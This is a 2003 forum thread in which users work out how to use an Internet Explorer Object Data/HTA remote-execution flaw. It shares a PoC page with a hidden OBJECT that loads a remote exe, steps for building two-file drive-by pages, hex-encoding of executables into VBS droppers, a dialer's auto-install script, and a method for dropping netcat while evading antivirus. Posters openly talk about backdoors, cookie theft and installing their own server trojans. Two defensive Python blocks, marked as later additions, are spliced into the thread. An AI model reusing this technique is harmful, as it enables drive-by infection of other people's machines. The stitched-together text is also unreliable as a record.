I have found a German security website where there is an example which uploads a file and executes it. It works with IE 5-6 and all current patches from MS; I think it's a lot of exploits in one, but I don't know how it works, but see for yourself. But your firewall must be off. The browser demo is (harmless): it uploads a file named ctbrowsercheck to c:\ and executes it, and opens a window where you can read a message. Here is the link: http://www.heise.de/security/dienste/brows.../htacheck.shtml (here is the English translated link, but the vulnerabilities do not work through Google: http://translate.google.com/translate?u=ht...ie=UTF8&oe=UTF8 ) and here is more info, translated with Google too: http://translate.google.com/translate?u=ht...ie=UTF8&oe=UTF8
Is that the "Multiple Microsoft Internet Explorer Script Execution Vulnerabilities"?
regards
matiano
mrBob
Sep 26 2003, 12:35 PM
Hmm, sometimes I really don't like Mr. Norton.
matiano
Sep 26 2003, 12:54 PM
@mrBob hmm...? That was not the answer to my question. Do you mean the Norton script blocker?
flame
Sep 27 2003, 12:14 AM
Wow, this actually worked on my system (XP SP2 and Internet Explorer 6.0, updated!!!). Can anyone get the source, 'cause I sure can't. Anyone?
matiano
Sep 27 2003, 11:05 AM
You can download the sources with GetRight Browser, but you must have visited (the site) before downloading the files (the GetRight Browser reads the cache). But I have no notion about shtml and php; I can only do html and jscript :-(
ykk
Sep 27 2003, 03:24 PM
I dumped the source of a site with a similar exploit.
I've said it before, but for those of you who missed it, I got an exploit that runs an exe locally on your machine that will pop open your CD drive here:
Also included is a link from there to the source, complete with documentation, to get a Perl script running that will log the IPs that visit it. I could make just two HTML files that would do this same thing, but that wouldn't log IPs.
matiano
Sep 28 2003, 10:28 AM
@yorn I know this website, which does not work with my patches, but my example does work with all current MS patches. I have grabbed the php script (htaalert.php) with GetRight Browser. There is an embedded VBS in it. When you download this file and open it (locally) with iexplore, then comes a stupid IE ActiveX security message (if you want...blabla, OK or Cancel); we must turn this off with some vulnerability. Here is the script to download: http://de.geocities.com/matiano_99/htaalert.php.zip
ykk
Sep 28 2003, 02:33 PM
I think there's a difference. On the other website, when I tried to open the jpg file, it's unreadable, but for yours it's a VBScript.
MOS
Sep 28 2003, 09:54 PM
One stupid question:
How can I translate an .exe file into something like:
MOS, that's simple: convert your ASCII to hex and change 00=y and FF=z, because IE doesn't know how to translate 00 (space). After that you must have a JS script or VBS which changes y into 00 and z into FF and writes the code into a file (exploit.exe). BTW, it's an old exploit from malware.
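A triage helper, added here and not from any poster in this thread, that undoes the 00=y / FF=z hex substitution gogu258 describes so an analyst can tell whether a string blob inside a suspicious VBS/JS dropper is an embedded Windows executable. The sample blob and script are constructed, and the MZ/PE check is a minimal header sanity check, not a full parser.

```python
import re

def decode_yz_hex(blob: str) -> bytes:
    """Decode one token at a time: 'y' -> 0x00, 'z' -> 0xff, else two hex digits.

    Tokenising per byte (instead of text-replacing 'y'/'z' first) makes a
    misaligned blob fail loudly rather than decode into garbage.
    """
    s = re.sub(r"\s+", "", blob)        # droppers usually wrap the blob across lines
    out = bytearray()
    i = 0
    while i < len(s):
        if s[i] == "y":
            out.append(0x00); i += 1
        elif s[i] == "z":
            out.append(0xFF); i += 1
        else:
            pair = s[i:i + 2]
            if len(pair) < 2 or "y" in pair or "z" in pair:
                raise ValueError(f"misaligned token {pair!r} at offset {i}")
            out.append(int(pair, 16)); i += 2
    return bytes(out)

def looks_like_pe(data: bytes) -> bool:
    """True if the bytes carry an MZ header whose e_lfanew points at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

# String literals made only of hex digits, 'y', 'z' and whitespace, 16+ chars long.
BLOB_RE = re.compile(r'"([0-9a-fA-Fyz\s]{16,})"')

def triage_script(script_text: str):
    """Return (decoded_size, is_pe) for every y/z-hex string literal in a script."""
    results = []
    for blob in BLOB_RE.findall(script_text):
        try:
            data = decode_yz_hex(blob)
        except ValueError:
            results.append((None, False))   # misaligned blob: still worth a manual look
            continue
        results.append((len(data), looks_like_pe(data)))
    return results

# Constructed sample: a minimal, hypothetical MZ/PE header (not a real binary)
# encoded with the 00 -> y, ff -> z scheme and embedded in a VBS-style dropper.
SAMPLE_BLOB = "4d5a90y" + "y" * 56 + "40yyy" + "5045yy"
SAMPLE_SCRIPT = 'Dim payload\npayload = "' + SAMPLE_BLOB + '"\n'

if __name__ == "__main__":
    print(triage_script(SAMPLE_SCRIPT))   # -> [(68, True)]
```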
relax
Sep 28 2003, 10:27 PM
QUOTE (gogu258 @ Sep 28 2003, 10:11 PM)
MOS, that's simple: convert your ASCII to hex and change 00=y and FF=z, because IE doesn't know how to translate 00 (space). After that you must have a JS script or VBS which changes y into 00 and z into FF and writes the code into a file (exploit.exe). BTW, it's an old exploit from malware.
Ummmm... how do I convert the ASCII to hex?
matiano
Sep 29 2003, 10:08 AM
@relax Look at packetstormsecurity.nl; here is the download link for a nice tool: http://packetstormsecurity.nl/trojans/exe2vbs.zip It converts any *.exe to VBS. It must be changed to fit the VBS code in htaalert.php, but I don't know how to adjust the <Add level2 Compression> so that it works? I get an error message --->
"16 bit Ms DOS subsystem C:\INSTAL~1.exe the Ntvdm CCU an invalid instruction discovered. CS:06c0 IP:20e3 OP:63 68 74 20 7a clicking it on "latches", in order to terminate application" shit
...but if it works we must still switch the ActiveX message off
...and this is a piece of code from a dialer's site, before you get infected by the dialer (this one uses a .cab file with inf and dll files too) --->
QUOTE
<script language="JavaScript"> <!--
var VLoadInstalled = 1;
var nAttempt = 1;
window.onerror = errorwindow;
function errorwindow(sMsg,sUrl,sLine){ VLoadInstalled = 0; return true; }
function Reload() {
  window.location.replace('http://download2.0190-dialer.com/autoload.cfm?src=60-1-1-19.exe&tgt=60-1-1-19.exe&dir=dialers&auto=1&fgc=FFFFFF&bgc=2C62A0&vid=&attempt=1');
  return;
}
function DUnsuccess() {
  window.location.replace('http://download2.0190-dialer.com/result.cfm?srcUrl=http://download2.0190-dialer.com/dialers/60-1-1-19.exe&fgc=FFFFFF&bgc=2C62A0&status=unsuccess&alt');
}
function DSuccess() {
  window.location.replace('http://download2.0190-dialer.com/result.cfm?srcUrl=http://download2.0190-dialer.com/dialers/60-1-1-19.exe&fgc=FFFFFF&bgc=2C62A0&status=success&alt');
}
function ErrorActiveX() {
  VLoadInstalled = 0;
  if(nAttempt < 2) {
    Reload();
    alert('Sie müssen die Installationsroutine mit <JA> bestätigen,\ndamit die Seite korrekt angezeigt werden kann.');
  } else {
    if( confirm('Sie haben die Zugangssoftware nicht installiert.\nUm die Seite korrekt anzuzeigen,\nmüssen Sie diese Software installieren.\n\nWollen Sie die Software jetzt installieren?') ) {
      nAttempt = 1 ; Reload();
    } else {
      if(nAttempt != 5){ DUnsuccess(); }
    }
  }
  return true;
}
If someone knows something about this, please post... THX!
what
Oct 1 2003, 03:25 AM
I'm having a little trouble with this, and since the link to the sources no longer works, I'm just guessing. Right now I have my own .php embedded file, and it all works locally on my computer, but it doesn't work on the web. I'm wondering if it just doesn't work with the service that I am using (which is Angelfire). Anyway, the file I am using can be found here. What it does is create NETCAT in the C:\ folder, but it doesn't execute it, so it won't trigger any AV software. Simply create an HTML document with the following as the source to make it work locally.
It should work the first time. After you run it once and want to run it again, delete the C:\nc.exe file so it will continue to exploit. Any and all feedback would be great. Remember: download the above .php file and execute the above code in an HTML document, leaving them in the same directory, and this will work. I need to know why this will not work on the web.
matiano
Oct 1 2003, 03:21 PM
@what I know what you mean; that's the same problem as with the IE "Exploit.SelfExecHtml" vulnerability... it works only locally. And have you tried it with the original php (htaalert.php) on the webserver?
Yorn
Oct 2 2003, 08:48 PM
Okay, I'm helping the little ones. For those of you who already knew how this worked, don't berate me for explaining it just one more time.
1) First, go check out http://sec.gravito.com/hta/
2) If your CD-ROM drive didn't open, find a different computer and repeat step 1
3) Take a look at the source on that HTML:
CODE
<HTML>
<OBJECT STYLE="display:none" DATA="http://sec.gravito.com/hta/?test.exe"> </OBJECT>
<font size="2" face="System">
<P>This is a proof-in-concept of the Object Data Remote Execution vulnerability. It doesn't actually do any damage, but we have tested it and it *does* work.</P>
<P>If your CDROM drive just opened up, you are exploitable. Please download the security update by heading to <A HREF="http://windowsupdate.microsoft.com">Windows Update</A>.</P>
<P>Or, <A HREF="hta-ver1.zip">download it</A> and figure out what the hell just happened.</P>
<P>Note: If your CD-ROM drive didn't open, don't tell me "it didn't work". I created this code for those individuals that know how to use it. If you're stupid enough to think that just because this didn't work on your computer that it "doesn't work" and feel a need to tell me about it, I will personally compromise your machine and "deltree /y c:\windows\"</p>
</font></HTML>
4) Note that the only items in that HTML that matter are between the "<OBJECT>" tags
YOU MUST USE TWO HTML FILES FOR THIS REMOTE EXPLOIT TO WORK. YOU MUST USE TWO HTML FILES FOR THIS REMOTE EXPLOIT TO WORK. YOU MUST USE TWO HTML FILES FOR THIS REMOTE EXPLOIT TO WORK.
Okay, so you don't need two HTML files, but one item simply "HAS" to point in an object reference to another. So you cannot code this in one HTML file.
So you've got your exploit with a VBS script saved as an .html right? Good job, you've got one of the *2* files needed for this exploit. The other .html file has to point to the one you've already made and do almost exactly what I did in the exploit on my security page:
5) Just make a new HTML and put these two lines above in it and change that DATA="<name of your already completed HTML>".
6) Then run the HTML that you made and see if it auto executes the other HTML you have. It should do it if you are on an unpatched machine. If you didn't listen to me and repeat step 1 till you found a machine that was affected, then you don't deserve to figure this exploit out. It's not like you can exploit everyone.
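Added example, not part of Yorn's post or his site's code: a static check for the hidden <OBJECT DATA=...> pattern he describes, usable for scanning cached or proxied pages for that vulnerability's fingerprint. Host names and the two sample pages are constructed; the code parses markup only and fetches nothing.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Extensions an <object> legitimately embeds; anything else with no TYPE is suspect.
MEDIA_SUFFIXES = (".svg", ".png", ".gif", ".jpg", ".jpeg", ".pdf", ".swf")

class ObjectCollector(HTMLParser):
    """Collect the attribute dict of every <object> start tag."""
    def __init__(self):
        super().__init__()
        self.objects = []

    def handle_starttag(self, tag, attrs):
        if tag == "object":                      # HTMLParser lowercases tag/attr names
            self.objects.append({k: (v or "") for k, v in attrs})

def object_findings(html: str, page_host: str):
    """Return one finding per <object> whose DATA matches the remote-execution pattern."""
    collector = ObjectCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.objects:
        data = attrs.get("data", "")
        if not data:
            continue
        url = urlsplit(data)
        reasons = []
        if "display:none" in attrs.get("style", "").replace(" ", "").lower():
            reasons.append("hidden object")
        if url.netloc and url.netloc.lower() != page_host.lower():
            reasons.append("data loaded from another host")
        if url.query.lower().endswith((".exe", ".hta")):
            reasons.append("executable name carried in the query string")
        if "type" not in attrs and not url.path.lower().endswith(MEDIA_SUFFIXES):
            reasons.append("no TYPE and DATA is not a media file")
        if reasons:
            findings.append({"data": data, "reasons": reasons})
    return findings

# Constructed samples (hypothetical hosts): the PoC shape from the thread, and a benign embed.
SUSPECT_PAGE = ('<HTML><OBJECT STYLE="display:none" DATA="http://evil.example.net/hta/?test.exe">'
                '</OBJECT><P>hello</P></HTML>')
BENIGN_PAGE = '<html><object data="/img/chart.svg" type="image/svg+xml"></object></html>'

if __name__ == "__main__":
    for f in object_findings(SUSPECT_PAGE, "www.example.org"):
        print(f["data"], "->", ", ".join(f["reasons"]))
```

A hit only says the page carries the pattern; whether the referenced resource is really an HTA is decided by the Content-Type the other server returns, so the vendor patch, not this check, is the fix.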
what
Oct 3 2003, 12:32 PM
Thanks Yorn! I'm sorry for the stupidity earlier. I remember going to the German site and seeing multiple pages loaded in IE; I wasn't quite sure how that worked. Again, thank you; I've been very curious about this, and at least I learned something from it. Also, I would like to say that this exploit should not be used in the wild, only for informational purposes, and therefore this exploit should not leave the forum, out of respect for the creator and hate for Microsoft.
relax
Oct 3 2003, 12:40 PM
QUOTE (Yorn @ Oct 2 2003, 08:48 PM)
Okay, I'm helping the little ones. For those of you who already knew how this worked, don't berate me for explaining it just one more time.
Yorn, that "test" doesn't work for me the way it is... here's my version of his test HERE; it might take a while to download lol
and don't go looking around that webspace unless you want to find the other pages that will install trojans and shit
what
Oct 4 2003, 01:15 AM
Alright, I finally got it down straight. I had to download Apache for Windows and reconfigure how it handles HTA files. Not that difficult, right? Thanks for the info, and I will soon have POC code of my own posted on my NEW Apache server. Thanks again to everyone that helped me; I learned more with this exploit than I believe with any other. The more knowledge, the more power.
Yorn
Oct 4 2003, 01:57 AM
QUOTE (what @ Oct 4 2003, 01:15 AM)
Alright, I finally got it down straight. I had to download Apache for Windows and reconfigure how it handles HTA files. Not that difficult, right? Thanks for the info, and I will soon have POC code of my own posted on my NEW Apache server. Thanks again to everyone that helped me; I learned more with this exploit than I believe with any other. The more knowledge, the more power.
No problem man.
The way I figure it, if you actually *LEARN* what you are doing then I'm more than happy to share what I know. It actually took me a little while to figure out the part about having object code in another HTML as I had never used <OBJECT> before.
what
Oct 4 2003, 09:01 PM
http://24.98.243.112/univ.html This code copies nc.exe into the C:\ folder; it does not execute it, so it won't trigger AV.
what
Oct 4 2003, 09:03 PM
Here is the code; sorry, I really messed up that other link.
niko
Oct 8 2003, 07:13 PM
Wow, this worked on ALL of my XP computers, at home and at work. It would be pretty powerful for cookie grabbing, or of course anything else, like installing a backdoor. Not pretty (well, it is pretty to some).
-niko
pedraM
Oct 8 2003, 07:21 PM
QUOTE (Yorn @ Oct 2 2003, 08:48 PM)
Okay, I'm helping the little ones. For those of you who already knew how this worked, don't berate me for explaining it just one more time.
It works without any error, but my server file never runs and downloads properly! (q.exe is not my server file.) I think I must edit the index.cgi file, but I don't know the CGI and Perl languages! Could anyone guide me?